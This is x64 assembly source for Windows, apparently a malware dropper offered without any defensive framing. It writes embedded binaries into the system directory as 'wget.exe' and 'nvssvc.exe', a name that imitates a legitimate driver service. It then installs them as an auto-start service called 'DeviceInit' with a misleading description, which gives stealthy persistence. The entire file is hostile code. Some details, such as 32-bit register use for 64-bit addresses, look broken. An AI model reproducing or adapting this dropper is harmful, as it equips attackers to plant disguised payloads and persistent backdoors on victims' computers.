global start NULL equ 0 SC_MANAGER_ALL_ACCESS equ 0xF003F SERVICE_ST

1. global start
2.  
3.  NULL equ 0
4.  
5.  SC_MANAGER_ALL_ACCESS equ 0xF003F
6.  SERVICE_START equ 16
7.  SERVICE_ALL_ACCESS equ 0xF01FF
8.  SERVICE_INTERACTIVE_PROCESS equ 0x00000100
9.  SERVICE_WIN32_OWN_PROCESS equ 0x00000010
10.  SERVICE_AUTO_START equ 0x00000002
11.  
12.  extern GetSystemDirectoryA
13.  extern lstrcatA
14.  extern CreateFileA
15.  extern WriteFile
16.  extern CloseHandle
17.  extern MessageBoxA
18.  extern ExitProcess
19.  extern GetCommandLineA
20.  extern GetModuleFileNameA
21.  extern OpenSCManagerA
22.  extern CreateServiceA
23.  extern CloseServiceHandle
24.  
25. section .data
26.  
27. Buffer db 260 dup (?)
28. hFile resq 1
29. pBytesWritten resq 1
30.  
31. SCH resq 1
32. SVC resq 1
33.  
34. %include 'client.inc'
35. client_name  db '\nvssvc.exe',0
36.  
37. %include 'wget.inc'
38. wget_name db '\wget.exe',0
39.  
40. SERVICE_NAME db 'DeviceInit',0
41. SERVICE_DISP db 'This custom service is used in Connected Device Platform scripts',0
42.  
43. section .code
44. start:
45.  
46.     sub esp , 64
47.    
48.     mov rdx , 260d
49.     mov rcx , Buffer
50.     call GetSystemDirectoryA
51.  
52.     mov rdx , wget_name
53.     mov rcx , Buffer
54.     call lstrcatA
55.  
56.     mov qword [rsp+30h] , 0
57.     mov qword [rsp+28h] , 0
58.     mov qword [rsp+20h] , 2
59.     xor r9 , r9
60.     mov r8 , 3
61.     mov edx , 0x80000000 + 0x40000000
62.     mov ecx , Buffer
63.     call CreateFileA
64.  
65.     mov [hFile] , rax
66.  
67.     mov qword [rsp+20h] , 0
68.     mov r9 , pBytesWritten
69.     mov r8 , [wget_len]
70.     mov rdx , wget
71.     mov rcx , rax
72.     call WriteFile
73.  
74.     mov rcx , [hFile]
75.     call CloseHandle
76.    
77. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
78.  
79.     mov rdx , 260d
80.     mov rcx , Buffer
81.     call GetSystemDirectoryA
82.  
83.     mov rdx , client_name
84.     mov rcx , Buffer
85.     call lstrcatA
86.  
87.     mov qword [rsp+30h] , 0
88.     mov qword [rsp+28h] , 0
89.     mov qword [rsp+20h] , 2
90.     xor r9 , r9
91.     mov r8 , 3
92.     mov edx , 0x80000000 + 0x40000000
93.     mov ecx , Buffer
94.     call CreateFileA
95.  
96.     mov [hFile] , rax
97.  
98.     mov qword [rsp+20h] , 0
99.     mov r9 , pBytesWritten
100.     mov r8 , [client_len]
101.     mov rdx , client
102.     mov rcx , rax
103.     call WriteFile
104.  
105.     mov rcx , [hFile]
106.     call CloseHandle
107.  
108.     call ServiceInit
109.    
110. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
111.  
112. ServiceInit:
113.  
114.     mov r8 , SC_MANAGER_ALL_ACCESS
115.     mov rdx , 0
116.     mov rcx , 0
117.     call OpenSCManagerA
118.  
119.     mov [SCH] , rax
120.  
121.     mov qword [rsp+60h] , 0
122.     mov qword [rsp+58h] , 0
123.     mov qword [rsp+50h] , 0
124.     mov qword [rsp+48h] , 0
125.     mov qword [rsp+40h] , 0
126.     mov qword [rsp+38h] , Buffer
127.     mov qword [rsp+30h] , 1
128.     mov qword [rsp+28h] , 2
129.     mov qword [rsp+20h] , 110
130.     mov r9 , SERVICE_ALL_ACCESS
131.     mov r8 , SERVICE_DISP
132.     mov rdx , SERVICE_NAME
133.     mov rcx , rax
134.     call CreateServiceA
135.  
136.     mov [SVC] , rax
137.  
138.     mov rcx , [SCH]
139.     call CloseServiceHandle
140.    
141.     mov rcx , [SVC]
142.     call CloseServiceHandle
143.  
144.     mov rcx , rax
145.     call ExitProcess